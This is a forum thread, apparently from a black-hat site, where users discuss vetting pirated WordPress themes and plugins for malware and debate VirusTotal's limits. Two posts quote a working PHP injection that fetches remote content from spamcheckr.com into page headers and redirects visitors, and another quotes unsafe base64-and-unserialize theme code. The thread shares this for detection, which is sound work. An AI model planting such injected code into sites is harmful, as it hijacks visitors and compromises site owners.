[ MUST READ ] SOMETHING THAT EVERYONE MUST DO BEFORE USING DOWNLOADED CODES AND THEME

***incredibleINDIA*** · 04-30-2014, 04:44 PM

(04-30-2014 02:12 PM)iapetos Wrote: You are very wrong about using virustotal.com. I commend you for trying to help people stay safe but I have to say that anyone pushing virustotal.com as a method of detecting threats, or relying on it to determine if a file is safe, is simply giving bad advice and repeating the bad information they were fed at one time.

That site is nothing more than a warm fuzzy for for people who don't know better. It does nothing to detect 0day threats or polymorphic threats. They use featureless cli utilities that don't include the tools necessary to be a viable A/V.

We all know that A/V products in general are an over hyped method of security. Nothing beats due diligence and actually looking at the code yourself.

I would say to anyone reading the OP section on virustotal.com to disregard it as an opinion not based upon fact.

I would encourage everyone to read their FAQ, more specifically the section on statistics. It's the part where they say not to use their own product in the manner in which this thread is pushing it. Here, take a look.

Those who use VirusTotal to perform antivirus comparative analyses should know that they are making many implicit errors in their methodology, the most obvious being:

VirusTotal's antivirus engines are commandline versions, so depending on the product, they will not behave exactly the same as the desktop versions: for instance, desktop solutions may use techniques based on behavioural analysis and count with personal firewalls that may decrease entry points and mitigate propagation, etc.
In VirusTotal desktop-oriented solutions coexist with perimeter-oriented solutions; heuristics in this latter group may be more aggressive and paranoid, since the impact of false positives is less visible in the perimeter. It is simply not fair to compare both groups.
Some of the solutions included in VirusTotal are parametrized (in coherence with the developer company's desire) with a different heuristic/agressiveness level than the official end-user default configuration.

These are just three examples illustrating why using VirusTotal for antivirus testing is a bad idea, you can read more about VirusTotal and antivirus comparatives in our blog.

https://www.virustotal.com/en/faq/#statistics

MAN VIRUS TOTAL IS NOT A END , IT IS JUST FIRST STEP , MORE IMPORTANT STEPS ARE GOING TO BE SHARED SOON

***incredibleINDIA*** · 04-30-2014, 04:46 PM

(04-30-2014 01:36 PM)semerkhet22 Wrote: @patelnirpendra, sorry if you did not understand me.

I was pointing to the fact that we must share all known malware that we encountered while testing downloaded themes and plugins so members could identify real threats.

Sorry again for the misunderstand.

OF COURSE I UNDERSTOOD YOU , EVERYONE IS FREE TO SHARE MALWARE CODES , EVEN I AM GOING TO GIVE +5 FOR THEM

***incredibleINDIA*** · 04-30-2014, 04:47 PM

(04-30-2014 01:43 PM)intrepid Wrote: Using exploit scanner plugin, there's a lot of base64 and eval code in native Wordpress and plugins that MANY people use.

SOON GOING TO ADD THEM

***dannyhat*** · 06-09-2014, 06:12 PM

Hey everyone.

I downloaded a few things from a site called "techerhut.com" and for a while didn't have any problems until I found this malicious code:

Code:

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,​1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

It redirects to a Justin Bieber video. If you ever downloaded the Easy Social Share Buttons plugin from that site you've got the malware. He's probably adding it to all his plugins. Get File Seek and check your themes and plugins for this malware.

***incredibleINDIA*** · 06-14-2014, 01:00 AM

(06-09-2014 06:12 PM)dannyhat Wrote: Hey everyone.

I downloaded a few things from a site called "techerhut.com" and for a while didn't have any problems until I found this malicious code:

Code:

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

It redirects to a Justin Bieber video. If you ever downloaded the Easy Social Share Buttons plugin from that site you've got the malware. He's probably adding it to all his plugins. Get File Seek and check your themes and plugins for this malware.

TRY TO ATTACHED FILE , INSTEAD OF THIS PIECE OF CODE

***DiskError*** · 06-14-2014, 06:37 AM

According to me, the best way to start with is to check the files included in your theme functions.php or your plugin main file.

You can search for strings like base64, eval or gzinflate as it could contain malicious code. Then go here to attempt to decode the suspicious lines of code: http://ddecode.com/phpdecoder/

***fsnsh6*** · (This post was last modified: 06-17-2014 12:57 PM by fsnsh6.)

one of file function.php line 139 has the base64 decode import, so is it safe for import? or Question:is this theme safe?

http:// bestblackhatforum . com/Thread-GET-ThemeForest-PRO-Business-Responsive-Multi-Purpose-Theme-PURCHASED?page=2

if(get_option('wpb_js_templates',"")==""){
$saved=wp_remote_get(get_template_directory_uri().'/admin/pages/saved.txt');
$import_code = base64_decode($saved['body']);
update_option( 'wpb_js_templates', unserialize($import_code), '', 'yes' );

virustotal scan show 1 tread

https://www.virustotal.com/ro/file/ef130.../analysis/

Detection ratio: 1 / 53
conclusion= not safe

***PinayXXX*** · 06-17-2014, 02:29 PM

(06-17-2014 12:44 PM)fsnsh6 Wrote: one of file function.php line 139 has the base64 decode import, so is it safe for import? or Question:is this theme safe?

http:// bestblackhatforum . com/Thread-GET-ThemeForest-PRO-Business-Responsive-Multi-Purpose-Theme-PURCHASED?page=2

if(get_option('wpb_js_templates',"")==""){
$saved=wp_remote_get(get_template_directory_uri().'/admin/pages/saved.txt');
$import_code = base64_decode($saved['body']);
update_option( 'wpb_js_templates', unserialize($import_code), '', 'yes' );

virustotal scan show 1 tread

https://www.virustotal.com/ro/file/ef130.../analysis/

Detection ratio: 1 / 53
conclusion= not safe

Thanks for the heads-up!